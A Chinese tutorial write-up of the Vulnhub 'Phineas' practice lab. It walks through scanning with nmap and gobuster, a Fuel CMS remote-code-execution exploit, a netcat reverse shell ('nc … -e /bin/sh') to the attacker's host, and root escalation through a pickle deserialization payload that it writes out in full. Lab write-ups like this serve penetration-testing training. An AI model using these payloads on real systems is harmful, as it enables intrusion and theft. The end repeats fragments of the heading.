Phineas 靶场渗透测试教学文档<\/h1>

靶场概述<\/h2>
Phineas 是一个 Vulnhub 上的渗透测试靶场，难度中等，主要考察信息收集、CMS漏洞利用和Python反序列化提权等技术。<\/p>

环境准备<\/h2>

渗透测试过程<\/h2>

主机发现<\/strong><\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现靶机IP：192.168.203.134<\/p>
<\/li>

端口扫描<\/strong><\/p>
nmap --min-rate 10000<\/span> -p- 192.168.203.134
<\/span><\/span>nmap -sT -A -sV -O -sC -p 22,80,111,3306 192.168.203.134 -oA .\/nmap\/detail
<\/span><\/span><\/code><\/pre>扫描结果显示开放端口：22(SSH)、80(HTTP)、111(RPC)、3306(MySQL)<\/p>
<\/li>

Web目录扫描<\/strong><\/p>
gobuster dir -w \/root\/Desktop\/Pentest\/fuzzDicts\/directoryDicts\/en_dirctories_all.txt -u http:\/\/192.168.203.134\/ -t 5<\/span>
<\/span><\/span><\/code><\/pre>发现目录：\/structure<\/code><\/p>
<\/li>

敏感文件扫描<\/strong><\/p>
gobuster dir -w \/root\/Desktop\/Pentest\/fuzzDicts\/directoryDicts\/fileName10000.txt -u http:\/\/192.168.203.134\/structure\/ -t 5<\/span>
<\/span><\/span><\/code><\/pre>发现文件：index.php<\/code>和README.md<\/code><\/p>
<\/li>

阅读README.md<\/strong><\/p>

网站使用Fuel CMS<\/li>
版本小于1.4<\/li>
<\/ul>
<\/li>
<\/ol>
二、漏洞利用<\/h3>


Fuel CMS RCE漏洞<\/strong><\/p>

漏洞影响版本：<= 1.4.1<\/li>
搜索公开漏洞利用代码<\/li>
<\/ul>
<\/li>

执行RCE<\/strong><\/p>
python exp.py -u http:\/\/192.168.203.134\/structure\/index.php
<\/span><\/span><\/code><\/pre>反弹shell命令（使用443端口成功）：<\/p>
nc 192.168.203.135 443<\/span> -e \/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>

获取数据库凭据<\/strong>

在\/var\/www\/html\/structure\/fuel\/application\/config\/database.php<\/code>中找到数据库配置信息<\/p>
<\/li>

SSH登录<\/strong>

尝试使用数据库凭据登录anna账户<\/p>
<\/li>
<\/ol>
三、权限提升<\/h3>


检查sudo权限<\/strong><\/p>
sudo -l
<\/span><\/span><\/code><\/pre>发现用户可以在web目录下以root权限执行Flask应用<\/p>
<\/li>

分析Flask应用<\/strong><\/p>

路径：\/home\/anna\/web<\/code><\/li>
端口：5000（本地监听）<\/li>
功能：接收POST请求，参数awesome<\/code>经过pickle反序列化<\/li>
<\/ul>
<\/li>

构造反序列化payload<\/strong><\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>class<\/span> genpoc<\/span>():
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        s =<\/span> """whoami > 2.txt"""<\/span>
<\/span><\/span>        return<\/span> os.<\/span>system, (s,)
<\/span><\/span>
<\/span><\/span>e =<\/span> genpoc()
<\/span><\/span>poc =<\/span> pickle.<\/span>dumps(e)
<\/span><\/span>print(poc)
<\/span><\/span>poc_base64 =<\/span> base64.<\/span>urlsafe_b64encode(poc)
<\/span><\/span>print(poc_base64)
<\/span><\/span><\/code><\/pre><\/li>

执行提权<\/strong><\/p>
curl http:\/\/127.0.0.1:5000\/heaven -d "awesome=gASVKQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjA53aG9hbWkgPiAyLnR4dJSFlFKULg=="<\/span>
<\/span><\/span><\/code><\/pre>修改payload为反弹shell命令，获取root权限<\/p>
<\/li>
<\/ol>
关键知识点总结<\/h2>


信息收集<\/strong><\/p>

使用多种工具进行全方位扫描<\/li>
注意README.md等描述文件<\/li>
关注robots.txt等标准文件<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong><\/p>

识别CMS类型和版本<\/li>
搜索公开漏洞利用代码<\/li>
反弹shell时尝试不同端口（443通常可用）<\/li>
<\/ul>
<\/li>

权限提升<\/strong><\/p>

检查sudo权限和SUID文件<\/li>
分析本地服务（netstat -anp）<\/li>
Python反序列化漏洞利用<\/li>
<\/ul>
<\/li>

经验技巧<\/strong><\/p>

维护高质量的字典文件<\/li>
尝试多种payload编码方式<\/li>
使用443等常见端口绕过限制<\/li>
<\/ul>
<\/li>
<\/ol>
参考命令总结<\/h2>
# 信息收集<\/span>
<\/span><\/span>arp-scan -l
<\/span><\/span>nmap --min-rate 10000<\/span> -p- <target>
<\/span><\/span>nmap -sT -A -sV -O -sC -p <ports> <target> -oA output
<\/span><\/span>gobuster dir -w <wordlist> -u <url> -t 5<\/span>
<\/span><\/span>
<\/span><\/span># 漏洞利用<\/span>
<\/span><\/span>python exp.py -u http:\/\/target\/path
<\/span><\/span>nc -lvnp 443<\/span>
<\/span><\/span>
<\/span><\/span># 权限提升<\/span>
<\/span><\/span>sudo -l
<\/span><\/span>netstat -anp | grep <port>
<\/span><\/span>curl http:\/\/127.0.0.1:<port>\/path -d "payload"<\/span>
<\/span><\/span><\/code><\/pre>通过这个靶场，可以全面练习从信息收集到权限提升的完整渗透测试流程，特别是CMS漏洞利用和Python反序列化漏洞的实战应用。<\/p>

Phineas 靶场渗透测试教学文档<\/h1>

靶场概述<\/h2> Phineas 是一个 Vulnhub 上的渗透测试靶场，难度中等，主要考察信息收集、CMS漏洞利用和Python反序列化提权等技术。<\/p>

渗透测试过程<\/h2>

靶场概述<\/h2>
Phineas 是一个 Vulnhub 上的渗透测试靶场，难度中等，主要考察信息收集、CMS漏洞利用和Python反序列化提权等技术。<\/p>